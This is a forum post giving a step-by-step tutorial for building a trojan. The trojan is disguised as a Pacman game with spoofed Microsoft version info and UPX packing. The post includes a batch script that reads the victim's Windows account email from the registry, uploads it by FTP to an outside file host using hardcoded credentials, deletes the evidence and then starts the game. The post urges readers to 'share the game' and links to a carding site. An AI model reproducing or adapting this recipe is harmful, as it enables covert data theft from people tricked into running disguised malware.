ALERT!
Click here to register with a few steps and explore all our cool stuff we have to offer!
Home
Upgrade
Credits
Help
Search
Awards
Achievements
 6088

The definitive tutorial for a Virus Maker

by datagroove - 09-19-2016 - 10:03 PM
#1
This tutorial will teach you how to develop a simple virus for data mining. I will teach you how to build a virus that show a infected user a message and in the background steals information for you.

For this you will require four softwares, two from Abyssmedia and the other two from other companies.
* Quick BATCH File Compiler
* SiteInFile Compiler
* Resource Hacker
* UPX

The virus that i will develop here is a game disguised with a email grabber.

*1* Create the game Pacman for Windows

To start, create a new folder on your desktop and save the html code into index.html

Code:
<html>
<title>Pacman for Windows</title>
<frameset rows="0%,100%">
    <frame name="1" src="#" scrolling="no" marginwidth="0" marginheight="0" noresize="noresize" frameborder="no" bordercolor="#050000">
    <frame name="flash" src="http://media.y8.com/system/contents/1043/original/pacman2.swf" bordercolor="#050000">
</frameset>
</html>

Now search online for an icon of Pacman and save in the same folder.

*2* Open SiteInFile Compiler and create a New Project.
* Select the index.html file and click next, add the icon and hit next
* On Border Style choose fixed and hit next
* In Display and Commands, deselect all the elements and hit next
* On the next screen hit next, next again and next
* On the last screen untick the box "Run Output file after building" and hit next
* Now you have a file called index.exe in the folder
* Close SiteInFile Compiler

*3* Open Resource Hacker and open index.exe
* Go to Version Info > 1 > 1033

* Modify the values to
VALUE "CompanyName", "Microsoft, Inc"
VALUE "FileDescription", "Pacman for Windows"
* Click on Compile Script, and then File > Save

*4* Open a command prompt and open the zip file of UPX. I'm using v3.91w but any version should do the trick
* Drag and drop upx.exe to the command prompt.
* Add a space in front of upx.exe in the command prompt and type -9 and drag and drop index.exe

This is a simple protection to protect the exe & to compress it. Also it will protect from been open with Resource Hacker again. If you open the index.exe with Resource Hacker it will say that the file is compressed.

*5* Rename index.exe to pacman_.exe

*6* Open Quick BATCH File Compiler and copy paste the code below

Code:
reg query HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\UserExtendedProperties\ >email.txt
@ftp -i -s:"%~f0"&GOTO:EOF
open ftp.uploaded.net
1356
rjhl
lcd email.txt
cd  /
binary
mput "*.*"
disconnect
bye
if exist email.txt del /q email.txt
%MYFILES%/pacman_.exe

Explanation:
1 line) Will query the registry for users on windows 10 that have an email associated to there login screen and save the entry to a file called email.txt
2 line) Will start FTP protocol
3, 4, 5 line) Will autenticate in a file hoster via ftp in this case uploaded.net with username 1356 and pass rjhl
6, 7, 8, 9, 10, 11 line) Will transfer the email.txt to the file hoster
12 line) Will delete the file.
13) Will start the game

*7* In Quick BATCH File Compiler
Tick the box (Include Version info into executable) and Add Product Name "Pacman for Windows"

*8* In Quick BATCH File Compiler
Go to the tab Embedded Files, add the pacman icon and add the pacman_.exe.

*9* In Quick BATCH File Compiler
Go to Project > Options
Select Ghost Application > OK
Now go to Project > Compile and save to your desktop

That's all, now share the game

With just a few lines and using commercial software anyone can create a virus for a specific task.
If you have follow all the steps and create a working virus you are now a virus maker
BestChange - Exchange money at the best rates - https://www.bestchange.com/?p=936130
Pure VPN - Protect your data with the best vpn - https://rebrand.ly/Pure_VPN
Contact me by Email - https://bit.ly/Contact_Hacxx_Gmail
The House Of Credit Card - Findsome.ru
Reply

Users browsing: 1 Guest(s)